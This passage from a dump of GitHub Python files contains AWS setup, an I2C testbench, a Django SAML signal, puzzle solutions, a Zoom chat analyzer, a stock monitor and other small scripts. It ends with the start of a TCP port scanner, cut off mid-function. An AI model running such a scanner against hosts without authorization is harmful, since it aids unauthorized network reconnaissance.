\n sg = sg, \n bootstrap_str = bootstrap_string, \n bootstrap_file = None if bootstrap_string else Configuration.args.bootstrap_script )\n return instance\n \n def _addRoute(vpc: Vpc) -> None:\n igw = InternetGateways.getInternetGateway(name=f\"{Configuration.project_name} igw\")\n igw.attachInternetGateway(vpc)\n rtb = vpc.getRouteTable()\n rtb.addIgwRoute(igw, '0.0.0.0/0')\n \n def run(project_name: str):\n vpc = CreateAWSResources._getVpc()\n subnet = CreateAWSResources._getSubnet(vpc=vpc)\n sg = CreateAWSResources._getSecurityGroup(vpc=vpc) \n instance = CreateAWSResources._getInstance(vpc=vpc, subnet=subnet, sg=sg)\n CreateAWSResources._addRoute(vpc)\n\n instance.wait_for_status_ok()\n\n pyperclip.copy(instance.public_ip_address)\n\n logging.info(f'''\n\n Instance IP Address: {instance.public_ip_address}. \n The IP address has been copied to your clipboard. \n \n ''')","repo_name":"tomdemay/glcloud","sub_path":"create_network_imports/create_aws_resources.py","file_name":"create_aws_resources.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37034748452","text":"import random\nfrom queue import Queue\n\nimport cocotb\nfrom cocotb import fork, log\nfrom cocotb.decorators import coroutine\nfrom cocotb.triggers import RisingEdge, FallingEdge, Event, Timer\n\nfrom cocotblib.Flow import Flow\nfrom cocotblib.Stream import Stream, StreamDriverMaster, Transaction\nfrom cocotblib.misc import assertEquals, randInt, ClockDomainAsyncReset, simulationSpeedPrinter, clockedWaitTrue, Bundle, randBits, randBool\nfrom spinal.I2CTester2.lib.misc import OpenDrainInterconnect, I2cSoftMaster\n\n\ncmdToData = [randBits(8) for x in range(256)]\n\ncrapyConflictCounter = 0\nnormalConflictCounter = 0\nnormalTransactionCounter = 0\n\n@coroutine\ndef clockedFuncWaitTrue(clk,that):\n while True:\n yield RisingEdge(clk)\n if that() == True:\n break\n\n@coroutine\ndef SlaveThread(scl,sda,clk,baudPeriod):\n global crapyConflictCounter\n global normalConflictCounter\n global normalTransactionCounter\n log.debug(\"x\")\n IDLE = 0\n START = 1\n DATA = 2\n state = IDLE\n dataState = 0\n scl.write(True)\n sda.write(True)\n\n sclLast = True\n sdaLast = True\n while True:\n yield RisingEdge(clk)\n sclValue = scl.read()\n sdaValue = sda.read()\n sclRising = sclValue and not sclLast\n sclFalling = not sclValue and sclLast\n sdaRising = sdaValue and not sdaLast\n sdaFalling = not sdaValue and sdaLast\n sclLast = sclValue\n sdaLast = sdaValue\n if state == IDLE:\n if sdaFalling and sclValue:\n state = START\n elif state == START:\n if sclFalling:\n state = DATA\n dataState = 0\n address = 0\n elif state == DATA:\n if sclRising:\n if dataState < 8:\n address |= sdaValue << (7-dataState)\n elif sclFalling:\n dataState += 1\n if dataState >= 8 and dataState < 16:\n if random.random() < 0.2: #Clock stretching\n scl.write(False)\n yield Timer(randInt(baudPeriod/10, baudPeriod*10))\n sda.write((cmdToData[address] >> (15-dataState)) & 1)\n yield Timer(baudPeriod/4);\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n sclLast = False\n else:\n sda.write((cmdToData[address] >> (15 - dataState)) & 1)\n elif(dataState == 6 and random.random() < 0.2):\n scl.write(False)\n if random.random() < 0.2: # Clock stretching\n yield Timer(randInt(baudPeriod / 10, baudPeriod * 10))\n yield Timer(baudPeriod / 2)\n sda.write(False)\n yield Timer(baudPeriod / 2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield 
Timer(baudPeriod)\n\n if random.random() < 0.5:\n #Normal conflict\n normalConflictCounter += 1\n for i in range(4):\n rand = randBool()\n scl.write(False)\n yield Timer(baudPeriod/2)\n sda.write(rand)\n yield Timer(baudPeriod/2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n assert sda.read() == rand\n\n scl.write(False)\n yield Timer(baudPeriod / 2)\n sda.write(False)\n yield Timer(baudPeriod / 2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n sda.write(True)\n else:\n #crapy conflict wihtout STOP\n crapyConflictCounter += 1\n scl.write(False)\n yield Timer(baudPeriod / 2)\n sda.write(True)\n yield Timer(baudPeriod / 2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n state = IDLE\n continue\n else:\n if random.random() < 0.2: #Clock stretching\n scl.write(False)\n yield Timer(randInt(baudPeriod/10, baudPeriod*10))\n sda.write(True)\n yield Timer(baudPeriod/4);\n scl.write(True)\n sclLast = False\n else:\n sda.write(True)\n elif sclValue:\n if sdaRising:\n state = 0\n if sdaFalling:\n state = 1\n pass\n\n\n\n\n\nclass MasterThread:\n def __init__(self, cmd, rsp, clk, reset, baudPeriod,softMaster):\n self.cmd = cmd\n self.rsp = rsp\n self.clk = clk\n self.baudPeriod = baudPeriod\n self.softMaster = softMaster\n self.cmdQueue = []\n self.cmdDriver = StreamDriverMaster(cmd,lambda : self.cmdQueue.pop(0) if self.cmdQueue and (random.random() < (1.0/10.0)) else None,clk,reset)\n\n\n\n @coroutine\n def run(self):\n global crapyConflictCounter\n global normalConflictCounter\n global normalTransactionCounter\n yield Timer(self.baudPeriod * 10)\n\n while crapyConflictCounter < 2 or normalConflictCounter < 3 or normalTransactionCounter < 40:\n while True:\n colision = False\n\n cmd = Transaction()\n cmd.mode = 0\n cmd.data = randBool()\n self.cmdQueue.append(cmd)\n\n address = randBits(8) | 2\n for bitId in range(8):\n cmd = Transaction()\n cmd.mode = 1\n cmd.data = (address >> (7 - bitId)) & 1\n self.cmdQueue.append(cmd)\n yield clockedWaitTrue(self.clk,self.rsp.valid)\n\n if self.rsp.payload.data != cmd.data:\n assert bitId == 6\n colision = True\n cmd = Transaction()\n cmd.mode = 3 #DROP\n cmd.data = randBool()\n self.cmdQueue.append(cmd)\n break\n if colision:\n continue\n\n for bitId in range(8):\n cmd = Transaction()\n cmd.mode = 1\n cmd.data = True\n self.cmdQueue.append(cmd)\n yield clockedWaitTrue(self.clk,self.rsp.valid)\n assert self.rsp.payload.data == ((cmdToData[address] >> (7-bitId)) & 1)\n\n if random.random() < 0.75:\n cmd = Transaction()\n cmd.mode = 2\n cmd.data = randBool()\n self.cmdQueue.append(cmd)\n if random.random() < 0.75: #no other master frame\n if random.random() < 0.5: # With inter frame delay\n yield Timer(randInt(0,self.baudPeriod*20))\n else:\n @coroutine\n def anotherFrameEmiter():\n yield self.softMaster.sendStart()\n for i in range(5):\n yield self.softMaster.sendBit(randBool())\n yield self.softMaster.sendStop()\n\n yield Timer(randInt(self.baudPeriod * 4, self.baudPeriod * 10))\n fork(anotherFrameEmiter())\n yield Timer(randInt(self.baudPeriod * 1, self.baudPeriod * 14))\n normalTransactionCounter += 1\n break\n\n\n while self.cmdQueue:\n yield Timer(self.baudPeriod * 10)\n\n\n@cocotb.test()\ndef test1(dut):\n cocotb.fork(ClockDomainAsyncReset(dut.clk, dut.reset,100000))\n cocotb.fork(simulationSpeedPrinter(dut.clk))\n\n baudPeriod = 2500000\n sclInterconnect = OpenDrainInterconnect()\n 
sclInterconnect.addHardDriver(dut.io_i2c_scl_write)\n sclInterconnect.addHardReader(dut.io_i2c_scl_read)\n\n sdaInterconnect = OpenDrainInterconnect()\n sdaInterconnect.addHardDriver(dut.io_i2c_sda_write)\n sdaInterconnect.addHardReader(dut.io_i2c_sda_read)\n\n dut.io_config_samplingClockDivider <= 3\n dut.io_config_timerClockDivider <= 24\n\n softMaster = I2cSoftMaster(sclInterconnect.newSoftConnection(), sdaInterconnect.newSoftConnection(), baudPeriod,dut.clk)\n slaveThread = fork(SlaveThread(sclInterconnect.newSoftConnection(), sdaInterconnect.newSoftConnection(),dut.clk,baudPeriod))\n masterThread = fork(MasterThread(Stream(dut,\"io_cmd\"),Flow(dut,\"io_rsp\"), dut.clk, dut.reset, baudPeriod,softMaster).run())\n\n yield masterThread.join()\n","repo_name":"SpinalHDL/SpinalHDL","sub_path":"tester/src/test/python/spinal/I2CTester2/IoMasterTester/ioMasterTester.py","file_name":"ioMasterTester.py","file_ext":"py","file_size_in_byte":9352,"program_lang":"python","lang":"en","doc_type":"code","stars":1406,"dataset":"github-code","pt":"52"} +{"seq_id":"70250425444","text":"from django.dispatch import receiver\n\nfrom djangosaml2.signals import pre_user_save\n\nfrom django.conf import settings\n\n\nACTIVE_GROUPS = set(getattr(settings, 'SAML_ACTIVE_GROUPS', []))\nSTAFF_GROUPS = set(getattr(settings, 'SAML_STAFF_GROUPS', []))\nSUPERUSER_GROUPS = set(getattr(settings, 'SAML_SUPERUSER_GROUPS', []))\nGROUPS_ATTRIBUTE = getattr(settings, 'SAML_GROUPS_ATTRIBUTE', 'memberOf')\n\n\n@receiver(pre_user_save)\ndef update_group_membership(\n sender, instance, attributes: dict, user_modified: bool, **kwargs) -> bool:\n \"\"\"Update user's group membership based on passed SAML groups\n\n Args:\n sender: The class of the user that just logged in.\n instance: User instance\n attributes: SAML attributes dict.\n user_modified: Bool whether the user has been modified\n kwargs:\n signal: The signal instance\n\n Returns:\n Whether or not the user has been modified. 
This allows the user\n instance to be saved once at the conclusion of the auth process\n to keep the writes to a minimum.\n \"\"\"\n assertion_groups = set(attributes.get(GROUPS_ATTRIBUTE, []))\n if SUPERUSER_GROUPS.intersection(assertion_groups):\n instance.is_superuser = True\n user_modified = True\n if STAFF_GROUPS.intersection(assertion_groups):\n instance.is_staff = True\n user_modified = True\n if ACTIVE_GROUPS.union(STAFF_GROUPS).union(SUPERUSER_GROUPS).intersection(assertion_groups):\n # All of the groups referenced above should be active.\n instance.is_active = True\n user_modified = True\n return user_modified\n","repo_name":"grahamgilbert/crypt-server-saml","sub_path":"signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"40895229409","text":"from typing import Dict, Tuple\n# import time\n# start_time = time.time()\n\nwith open('input.txt', 'r') as file:\n path1, path2 = file.read().split('\\n')\n\ndr = {'U': 1, 'D': -1, 'L': 0, 'R': 0}\ndc = {'R': 1, 'L': -1, 'U': 0, 'D': 0}\n\nvisited: Dict[Tuple[int,int], int]\nvisited = {} # maps coordinates to steps taken to get there\n\nr = c = length = 0\n\nfor command in path1.split(','):\n op = command[0] # def not copying leo\n steps = int(command[1:])\n\n for step in range(steps):\n r += dr[op]\n c += dc[op]\n length += 1\n visited[(r,c)] = length\n\nmin_distance = float('inf')\nr = c = length = 0\n\nfor command in path2.split(','):\n op = command[0]\n steps = int(command[1:])\n\n for step in range(steps):\n r += dr[op]\n c += dc[op]\n length += 1\n\n if (r,c) in visited:\n min_distance = min(min_distance, length + visited[(r,c)])\n print(min_distance)\n\n# print(\"--- %.6f seconds ---\" % (time.time() - start_time))\n\n# > time python3 day03.py \n# 0.220s","repo_name":"jsondoo/AdventOfCode","sub_path":"2019/day03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23132043055","text":"from Library import *\r\nfrom guideline import *\r\n\r\n##############어깨##############\r\n#어깨 가이드라인 겹치기\r\ndef Media_Shoulder():\r\n count = 0\r\n saveon = False\r\n Start_Time = time.time()\r\n\r\n with mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\r\n while cv2.waitKey(1) < 0:\r\n frames = PIPELINE.wait_for_frames()\r\n depth_frames = ALIGN.process(frames)\r\n frame = frames.get_color_frame()\r\n depth = depth_frames.get_depth_frame()\r\n\r\n if not frame or not depth:\r\n continue\r\n\r\n frame = cv2.cvtColor(np.asanyarray(frame.get_data()), cv2.COLOR_BGR2RGB)\r\n\r\n MP_landmark = pose.process(frame)\r\n if 0 <= int(L_SHOULDER.x) < WIDTH and 0 <= int(L_SHOULDER.y) < HEIGHT:\r\n if 0 <= int(R_SHOULDER.x) < WIDTH and 0 <= int(R_SHOULDER.y) < HEIGHT:\r\n L_SHOULDER.z = depth.get_distance(int(L_SHOULDER.x), int(L_SHOULDER.y))\r\n R_SHOULDER.z = depth.get_distance(int(R_SHOULDER.x), int(R_SHOULDER.y))\r\n MIDDLE_LR_S.z = (L_SHOULDER.z + R_SHOULDER.z) / 2\r\n\r\n # #가이드라인 확인 5초마다\r\n if time.time() - Start_Time > N_SECONDS:\r\n count += 1\r\n Start_Time = time.time()\r\n\r\n if INguideline(depth, MP_landmark):\r\n saveon = save()\r\n\r\n #*미디어 파이프 그리기\r\n mp_drawing.draw_landmarks(\r\n frame,\r\n MP_landmark.pose_landmarks,\r\n mp_pose.POSE_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style()\r\n )\r\n \r\n #가이드 라인 추가 
및 텍스트 설정\r\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\r\n frame = cv2.flip(frame,1)\r\n frame = cv2.bitwise_and(frame,GUIDELINE)\r\n frame = GuideText(frame)\r\n \r\n #화면 표시\r\n cv2.imshow(\"\", frame)\r\n\r\n # 종료 조건\r\n if cv2.waitKey(5) & 0xFF == 27:\r\n break\r\n \r\n # 타임 아웃\r\n if count > COUNTOUT:\r\n break\r\n \r\n if saveon:\r\n #저장완료\r\n break\r\n\r\n\r\n############## SAVE MEDIA #################\r\n\r\n#어깨 영상 저장\r\ndef save():\r\n VIDEO_COLOR_WRITER = cv2.VideoWriter(ROOT_DIR + '/image/color_output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 10, (WIDTH, HEIGHT), isColor = True)\r\n #VIDEO_DEPTH_WRITER = cv2.VideoWriter('C:/lab/Demo/image/depth_output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 10, (WIDTH, HEIGHT), isColor = True)\r\n #* 촬영 시작\r\n STR.guide = '촬영을 시작합니다 3'\r\n \r\n stime = cv2.getTickCount() # 시작 시간 기록\r\n # RGB 프레임을 받아옴\r\n with mp_pose.Pose(min_detection_confidence=0.5,min_tracking_confidence=0.5) as pose:\r\n while cv2.waitKey(1) < 0:\r\n\r\n frames = PIPELINE.wait_for_frames()\r\n depth_frames = ALIGN.process(frames)\r\n color_frame = frames.get_color_frame()\r\n depth_frame = depth_frames.get_depth_frame()\r\n \r\n if not color_frame: continue\r\n \r\n # RGB 프레임을 이미지로 변환\r\n color_image = np.asanyarray(color_frame.get_data())\r\n depth_iamge = np.asanyarray(depth_frame.get_data())\r\n \r\n #가이드 라인 체크\r\n frame = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)\r\n results = pose.process(frame)\r\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n frame = cv2.bitwise_and(frame, GUIDELINE)\r\n \r\n if not INguideline(depth_frame, results):\r\n STR.guide = \"가이드라인 안에 들어와주세요\"\r\n return False\r\n \r\n frame = cv2.flip(frame,1)\r\n frame = GuideText(frame)\r\n cv2.imshow(\"\", frame)\r\n\r\n\r\n ctime = cv2.getTickCount() # 현재 시간 기록\r\n etime = (ctime - stime) / cv2.getTickFrequency() # 경과 시간 계산\r\n\r\n\r\n # 5초가 경과하면 녹화 종료\r\n if 1 < etime < 2:\r\n STR.guide = '촬영을 시작합니다 2'\r\n elif 2 < etime < 3:\r\n STR.guide = '촬영을 시작합니다 1'\r\n \r\n # 동영상에 프레임을 추가\r\n elif etime > 3:\r\n STR.guide = \"촬영중입니다. 
움직이지마세요.\"\r\n VIDEO_COLOR_WRITER.write(cv2.flip(color_image,1))\r\n if etime > 8:\r\n break\r\n\r\n # 동영상 저장 종료\r\n VIDEO_COLOR_WRITER.release()\r\n\r\n print('동영상 저장 완료')\r\n \r\n return True","repo_name":"watergun0613/Capstone","sub_path":"Demo/shoulder.py","file_name":"shoulder.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71467463204","text":"def precedence(op):\n value = 0\n if op == '+' or op == '-':\n value = 1\n elif op == '*' or op == '/':\n value = 2\n\n return value\n\n\ndef applyOp(a, b, op):\n result = 0\n if op == '+':\n result = a + b\n elif op == '-':\n result = a - b\n elif op == '*':\n result = a * b\n elif op == '/':\n result = a // b\n\n return result\n\n\ndef eval(expression):\n # value stack to store integer values\n values = []\n\n # operator stack to store operators\n ops = []\n\n i = 0\n while i < len(expression):\n if expression[i] == ' ': # current token is white space\n i += 1\n continue\n elif expression[i] == '(': # current token is opening brace, push it to op stack\n ops.append(expression[i])\n elif expression[i].isdigit(): # current token is a number, push it to value stack\n tmp = 0\n while i < len(expression) and expression[i].isdigit(): # current token is multiple digits number\n tmp = (tmp * 10) + int(expression[i])\n i += 1\n\n values.append(tmp)\n elif expression[i] == ')':\n while len(ops) != 0 and ops[-1] != '(':\n val2 = values.pop() # pop second value first\n val1 = values.pop()\n op = ops.pop()\n tmp = applyOp(val1, val2, op)\n values.append(tmp)\n\n ops.pop() # op stack pop opening brace\n else: # current token is operator\n # if top of ops stack has same or greater precedence to current token, pop op from ops stack and calculate\n while len(ops) != 0 and precedence(ops[-1]) >= precedence(expression[i]):\n val2 = values.pop()\n val1 = values.pop()\n op = ops.pop()\n tmp = applyOp(val1, val2, op)\n values.append(tmp)\n # else push current token to ops stack\n ops.append(expression[i])\n\n i += 1\n\n # entire expression has been parsed, final step is to\n # apply remaining ops to remaining values\n print('ops: ', ops)\n print('values: ', values)\n while len(ops) != 0 and len(values) > 1:\n val2 = values.pop()\n val1 = values.pop()\n op = ops.pop()\n tmp = applyOp(val1, val2, op)\n values.append(tmp)\n\n # now values stack only remain one value\n # we need check if first operator is '-'\n while len(ops) != 0:\n op = ops.pop()\n if op == '-':\n values[0] *= -1\n\n print('ops: ', ops)\n print('values: ', values)\n return values[-1]\n\n\nex = \"- (3 + (2 - 1) )\"\nprint(eval(ex))\n","repo_name":"jlpcri/daily-interview-pro","sub_path":"017_Create_a_simple_calculator/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27444543456","text":"'''\r\n\r\nexample by: dlefcoe\r\n\r\ndarren@redhedge.uk\r\ntwitter: @dlefcoe\r\n\r\nthe cuser cannot use pack and grid together.\r\nie. 
pack & grid are mutually exclusive.\r\n\r\nframe lets both exist together.\r\n\r\n'''\r\n\r\n# imports\r\nimport tkinter as tk\r\nimport os\r\n\r\n# explicit imports\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter import messagebox\r\n\r\n\r\nroot = tk.Tk()\r\nroot.title('RedHedge - multiple window example')\r\nroot.iconbitmap('RH_icon.ico')\r\n\r\ndef open_window():\r\n    global my_image\r\n    top = tk.Toplevel()\r\n    top.title('the second window')\r\n    top.iconbitmap('RH_icon.ico')\r\n\r\n    tk.Label(top, text='hello world').pack()\r\n    tk.Label(root,text='the main one').pack()\r\n\r\n    tk.Button(top, text='close window', command=top.destroy).pack()\r\n\r\n\r\n    my_image = ImageTk.PhotoImage(Image.open('images/adjusted yld curve 2020-08-12 13_17_53.png'))\r\n    tk.Label(top, image=my_image ).pack()\r\n\r\nbutton = tk.Button(root, text='open the second window', command=open_window)\r\nbutton.pack()\r\n\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n","repo_name":"dlefcoe/generalTests","sub_path":"new_window.py","file_name":"new_window.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37516145469","text":"students = []\nsecondLow = []\nif __name__ == '__main__':\n    for _ in range(int(input())):\n        name = input()\n        score = float(input())\n        students.append([name, score])\n\nstudents = sorted(students, key=lambda x: x[1])\nfirst = students[0][1]\nsecond = first\ni = 0\nwhile first == second:\n    i = i + 1\n    second = students[i][1]\n\nfor _ in students:\n    if second == _[1]:\n        secondLow.append(_[0])\n\nsecondLow.sort()\nprint(*secondLow, sep=\"\\n\")\n\n","repo_name":"SupremeSadat/HackerRank","sub_path":"Python Solutions/Basic Data Types/Nested Lists.py","file_name":"Nested Lists.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28010089060","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis code was created as a means of automatically analyzing the saved\r\nZoom chat transcripts for student participation.\r\n\r\nIt measures the number of times a student comments in the chat thread\r\nand the total number of characters they type. What you do with this information\r\nis obviously course and grading rubric specific. I plan on using this\r\nat a minimum to take attendance.\r\n\r\nThis code considers all the folders in your Zoom folder and only analyzes\r\nthose that contain our course name, assuming you set up your recurring\r\nZoom meeting with a consistent name. See the \"req_string\" variable.\r\n\r\nCreated on Fri Sep 4 08:41:27 2020\r\nGNU GENERAL PUBLIC LICENSE\r\n@author: Christopher V. 
Kelly, cvkelly@wayne.edu\r\n\"\"\"\r\n# %%\r\n\r\nimport numpy as np\r\nfrom os import listdir, getcwd\r\nimport csv\r\n\r\n# %%\r\n\r\nstudent_names = ['Nora Jones',\r\n 'Jimmy Page',\r\n 'Frederic Chopin',\r\n 'Stevie Ray Vaughan',\r\n 'Neil Young',\r\n 'Mandarin Orange',\r\n 'Carolina Chocolate Drops',\r\n 'Alice Cooper',\r\n 'Eric Clapton'] # must be unique\r\n\r\n# super-folder that contains all Zoom chats saved as .txt files\r\n# in which there is one sub-folder per class time\r\nfold_in = getcwd()\r\n\r\n# a required text string within the sub-folder\r\n# folders that don't have this string will be ignored\r\nreq_string = 'Biological Physics'\r\n\r\n# folder and file name into which the resulting CSV file will be saved\r\nfold_save = fold_in\r\nfile_save = req_string + ' Chat Participation Data.csv'\r\n\r\n# name of .txt file saved by Zoom\r\nfile = 'meeting_saved_chat.txt'\r\n\r\n# %% initialize some parameters\r\nnum_comments = np.zeros((len(student_names),1000))\r\nnum_total_char = np.zeros((len(student_names),1000))\r\nclass_num = -1\r\nclass_date_list = []\r\nt1 = ' From '\r\nt2 = ' : '\r\n\r\n# %% analyze all chat transcripts\r\nfor fold2 in listdir(fold_in): # loop over each subfolder\r\n a = fold2.find(req_string)\r\n if a > -1: # keep only those that are for your class of interest\r\n class_num += 1\r\n class_date_list.append(fold2[:11])\r\n f = open(fold_in+'\\\\'+fold2+'\\\\'+file,'r')\r\n line = '00'\r\n while len(line)>0: # keep going as long as there are new lines in the transcript\r\n line = f.readline()\r\n for snum,stud in enumerate(student_names): # loop over each student\r\n if line.find(t1+stud)>0 or line.find(t1+' '+stud)>0:\r\n num_comments[snum,class_num] += 1\r\n num_char = len(line)-line.find(t2)-2\r\n num_total_char[snum,class_num] += num_char\r\n f.close()\r\n # print(class_date)\r\n\r\nnum_comments = num_comments[:,:class_num+1] # reduce the array size for the appropriate number of classes\r\nnum_total_char = num_total_char[:,:class_num+1] # reduce the array size for the appropriate number of classes\r\n\r\n# %% Have a quick look at the data to ensure it makes sense\r\n# You may want to comment out these lines if you have a large class\r\nprint('num_comments')\r\nprint(num_comments)\r\n\r\nprint('num_total_char')\r\nprint(num_total_char)\r\n\r\n\r\n# %% Write the results in to a CSV file that can be easily viewed and analyzed with Excel\r\nfwrite1 = open(fold_save + '\\\\' + file_save,'w',newline='')\r\nfwrite2 = csv.writer(fwrite1)\r\n\r\n# write the data for the number of chats per student\r\nfwrite2.writerow(['NUMBER OF CHATS']+class_date_list)\r\nfor snum,stud in enumerate(student_names):\r\n fwrite2.writerow([stud]+list(num_comments[snum,:]))\r\nfwrite2.writerow([' ']*(num_comments.shape[1]+1))\r\n\r\n# write the data for the number of characters per student\r\nfwrite2.writerow(['NUMBER OF CHARACTERS']+class_date_list)\r\nfor snum,stud in enumerate(student_names):\r\n fwrite2.writerow([stud]+list(num_total_char[snum,:]))\r\n\r\nfwrite1.close()\r\n","repo_name":"CVKellyWSU/Analyze-Zoom-Participation","sub_path":"Analyse_Zoom_Chats.py","file_name":"Analyse_Zoom_Chats.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4855618156","text":"from Domain.Enums.OnlineColumns import onlineColumns\nfrom Domain.Enums.TableType import tableType\nfrom Infrastructure.Repository.OfflineDataRepository import offlineData_repo\nfrom 
Infrastructure.Repository.OnlineDataRepository import onlineData_repo\nfrom Application.Services.ReadData.ReadOffline.ReadOfflineServices import read_offline_services\nfrom Application.Services.ReadData.ReadOnline.OnlineDataHandler import onlineDataHandler\nfrom Application.Utility.TimeUtility import *\nfrom Infrastructure.Repository.TickerRepository import ticker_repo\nfrom Application.Services.DataProcess import get_data_from_web\nfrom datetime import datetime\nimport winsound\nfrom tkinter import *\nfrom tkinter import ttk\n\n# Create an instance of tkinter frame\nwin = Tk()\n\n# Set the size of the tkinter window\nwin.geometry(\"1700x1350\")\ns = ttk.Style()\ns.theme_use('clam')\ns.configure(\"Treeview\",\n\tbackground=\"#D3D3D3\",\n\tforeground=\"black\",\n\trowheight=25,\n\tfieldbackground=\"#D3D3D3\")\n\n# Add a Treeview widget\ntree = ttk.Treeview(win, column=(\"c1\", \"c2\", \"c3\", \"c4\", \"c5\", \"c6\", \"c7\"), show='headings', height=100)\ntree.column(\"# 1\", anchor=CENTER)\ntree.column(\"# 2\", anchor=CENTER)\ntree.column(\"# 3\", anchor=CENTER)\ntree.column(\"# 4\", anchor=CENTER)\ntree.column(\"# 5\", anchor=CENTER)\ntree.column(\"# 6\", anchor=CENTER)\ntree.column(\"# 7\", anchor=CENTER)\ntree.heading(\"# 1\", text=\"Signal Type\")\ntree.heading(\"# 2\", text=\"Ticker\")\ntree.heading(\"# 3\", text=\"Buy Percapita\")\ntree.heading(\"# 4\", text=\"Sell Percapita\")\ntree.heading(\"# 5\", text=\"Real Power\")\ntree.heading(\"# 6\", text=\"Price Change\")\ntree.heading(\"# 7\", text=\"Volume Ratio\")\n\nIDs = ticker_repo().read_list_of_tickers(tickerTypes= [1])[\"ID\"]\n\ncache = onlineDataHandler(IDs)\n\ndef action():\n\n winsound.Beep(500, 200)\n tree.delete(*tree.get_children())\n\n while True:\n try:\n (onlineDataList, cacheDataDict) = get_data_from_web()\n break\n except:\n continue\n\n if cacheDataDict == None:\n print('None')\n\n else:\n\n cache.update(cacheDataDict)\n\n print(datetime.now())\n\n # run strategy\n lastPrice = cache.lastPrice(num= 10)\n maxAllowedPrice = cache.maxAllowedPrice()\n lastPricePrc5 = cache.lastPricePRC(decNum= 20, num= 2)\n volumeDif = cache.volumeDif(num=1, decNum= 5)\n volume = cache.volume(num=1)\n buyPerCapita = cache.perCapitaBuy(num= 1)\n sellPerCapita = cache.perCapitaSell(num= 1)\n realPower = cache.realPower(num= 1)\n\n availableIDs = list(lastPrice.keys())\n\n signaledData = []\n\n def single_ticker_calc(ID):\n\n priceDif5 = round(lastPricePrc5[ID][-1]-lastPricePrc5[ID][0], 1)\n volumeRatio = round(volumeDif[ID][-1]/volume[ID][-1], 2)\n\n if lastPrice[ID][0] == maxAllowedPrice[ID]:\n\n numberOfBuyQueueTimes = 0\n for price in lastPrice[ID]:\n if price == maxAllowedPrice[ID]:\n numberOfBuyQueueTimes += 1\n\n if numberOfBuyQueueTimes < 5:\n\n signaledData.append(('BQ...', str(ticker_repo().read_by_ID(ID)['FarsiTicker']),\n buyPerCapita[ID][0], sellPerCapita[ID][0], round(realPower[ID][0], 2), priceDif5, volumeRatio))\n\n \n if buyPerCapita[ID][0] > 30 and lastPrice[ID][0] != maxAllowedPrice[ID]:\n signaledData.append(('Good Condition but not BQ', str(ticker_repo().read_by_ID(ID)['FarsiTicker']),\n buyPerCapita[ID][0], sellPerCapita[ID][0], round(realPower[ID][0], 2), priceDif5, volumeRatio))\n\n\n for ID in availableIDs:\n try:\n single_ticker_calc(ID)\n except:\n print('Error')\n\n signaledData.sort(key=lambda tup: tup[2], reverse=True)\n\n for tickerData in signaledData:\n tree.insert('', 'end', text=\"1\", values=tickerData)\n \n win.after(15000, action) \n\ntree.pack()\n\nwin.after(15000, 
action)\n\nwin.mainloop()","repo_name":"shakouri20/BoursePlus","sub_path":"onlineStrategyBuyQueue.py","file_name":"onlineStrategyBuyQueue.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74837052965","text":"import socket\nimport sys\n\ndef usage(error = 0):\n print(\"Usage: scanner.py -v -p \")\n sys.exit(error)\n\ndef process_arguments():\n verbose = False\n aux_ports = []\n max_number_of_arguments = 5\n min_number_of_arguments = 2\n\n if len( sys.argv ) < min_number_of_arguments or len( sys.argv ) > max_number_of_arguments :\n usage(1)\n\n for pos in range(len(sys.argv)):\n if sys.argv[pos] == \"-h\" or sys.argv[pos] == \"--help\":\n usage(0)\n if sys.argv[pos] == \"-p\" or sys.argv[pos] == \"--ports\":\n if len(sys.argv) < pos + 3 :\n usage(1)\n aux_ports = sys.argv[pos + 1].split(',')\n if sys.argv[pos] == \"-v\":\n verbose = True\n\n ip = sys.argv[-1]\n if not isinstance(ip, str):\n usage(1)\n\n ports = []\n for p in aux_ports:\n\n port = p.split('-')\n if not str.isdigit( port[0] ) :\n usage(1)\n\n if len(port) > 1 and str.isdigit( port[1] ):\n ports.extend( range( int(port[0]), int(port[1]) + 1 ) )\n else:\n ports.append( int(port[0]) )\n\n return ports, ip, verbose\n\ndef scan_port(ip, port, verbose):\n if verbose:\n print(\"Trying to connect to port: \" + str(port))\n\n try:\n s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )\n\n res = s.connect_ex(( ip, port ))\n if res 